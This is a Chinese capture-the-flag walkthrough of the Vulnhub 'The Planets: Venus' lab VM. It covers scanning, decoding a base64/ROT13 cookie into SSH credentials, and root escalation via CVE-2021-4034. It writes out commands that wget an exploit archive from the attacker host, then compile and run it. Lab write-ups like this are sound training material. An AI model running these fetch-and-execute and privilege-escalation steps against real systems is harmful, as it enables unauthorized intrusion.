Vulnhub靶机The Planets:Venus渗透测试详解
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这是一个漏洞靶机,老样子需要找到flag即可。
Vulnhub靶机下载:
官网下载:https://download.vulnhub.com/theplanets/Venus.ova
Vulnhub靶机安装:
下载好了把安装包解压 然后使用Oracle VM
打开即可。
![在这里插入图片描述](https://img-blog.csdnimg.cn/0d5c7eb5aa6b4677b780aaf717c65dc6.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/fffc896fa72a49828c3427dce923f294.png)
Vulnhub靶机漏洞详解:
①:信息收集:
kali
里使用arp-scan -l
或者netdiscover
发现主机
![在这里插入图片描述](https://img-blog.csdnimg.cn/01ef3b4b93264642a7e793c8119ee241.png)
渗透机:kali IP :192.168.0.105 靶机IP :192.168.0.102
使用命令:nmap -sS -sV -A -n -p- 192.168.0.102
![在这里插入图片描述](https://img-blog.csdnimg.cn/161a6185ee5f452faef90e7eeaf167a0.png)
开启了8080
和22
端口访问8080
,通过分析可以得出这是个Python
的网页Django
框这里有提示:可以使用guest
账号登入密码一样。
![在这里插入图片描述](https://img-blog.csdnimg.cn/6b44b802e7694f3ba9ab1dfb6163e255.png)
登入成功后看到有个金星得图片,接着使用dirsearch
扫一下发现都重定向到 Django
管理登入界面
![在这里插入图片描述](https://img-blog.csdnimg.cn/3d7857319fde42a9956166564a9361a8.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/9e0a8ede7a984765b67d2beb49fe3ed0.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/d287bb94833147eba119f7d775f197b0.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/922f76d16aa94dab91bddc9dac497235.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/264ef40a46d1405a90a4c77edddbfe63.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/b946cccc50dd4959ae3c0345cef8ef48.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/63ac34da457e4e8abd421b9b735452a0.png)
venus
也base64
加密然后 抓包生成得venus:thrfg
将irahf
使用Rot13
解密后得到密码也为venus
得到bWFnZWxsYW46aXJhaGZ2bmF0cmJ5YnRsMTk4OQ==
base64
解密后为magellan:irahfvnatrbybtl1989
在进行rot13
解密得到:venusiangeology1989
最终得到账号密码为:magellan/venusiangeology1989
网页尝试无果,尝试SSH登入,登入成功!!!
②:SSH登入:
登入成功获取第一个FLAG。
![在这里插入图片描述](https://img-blog.csdnimg.cn/db9ed719c9dd4c1d972e3ebef5c08f95.png)
③:CVE-2021-4034漏洞提权:
使用命令:find / -perm -u=s -type f 2>/dev/null
查看可以利用得权限
![在这里插入图片描述](https://img-blog.csdnimg.cn/9e564f13836149908940f292e68531ff.png)
和Mercury
一样可以使用这个提权 这里就方便多了,靶机里面有unzip
不需要使用tar
在进行打包解压了
cd /tmp
wget http://192.168.0.105/CVE-2021-4034-main.zip
unzip CVE-2021-4034-main.zip
cd CVE-2021-4034-main/
make
./cve-2021-4034
![在这里插入图片描述](https://img-blog.csdnimg.cn/10e6357349df4561a2da6bd8a1cf299a.png)
④:获取FLAG:
![在这里插入图片描述](https://img-blog.csdnimg.cn/ba44a0edd84a4ae2adb073154759e06f.png)
⑤:缓冲区溢出和提权:
这里我不会想学得可以参考:https://medium.com/@mcl0x90/the-planets-venus-vulnhub-write-up-f6727d08bafb
至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!
Vulnhub靶机渗透总结:
这个靶机难度高,主要i是最后得提权吧
1.信息收集arp-scan -l
获取ip地址 和端口信息 web
扫描工具:nikto,dirb,dirbuster,whatweb,ffuf
等 查看F12
源码信息
2.替换Cookie
值 进行解密 Base64
和Rot13
解密
3.CVE-2021-4034
漏洞得利用(漏洞很强大!)
4.缓冲区溢出提权(参考大佬wp 比较难 不太会)
![在这里插入图片描述](https://img-blog.csdnimg.cn/02a4e99fb5a64a1088402f7b32d6d9fc.png)
The Planets
系列完结啦,学习到了很多知识点又是收获满满的一天(耶耶耶!)
最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!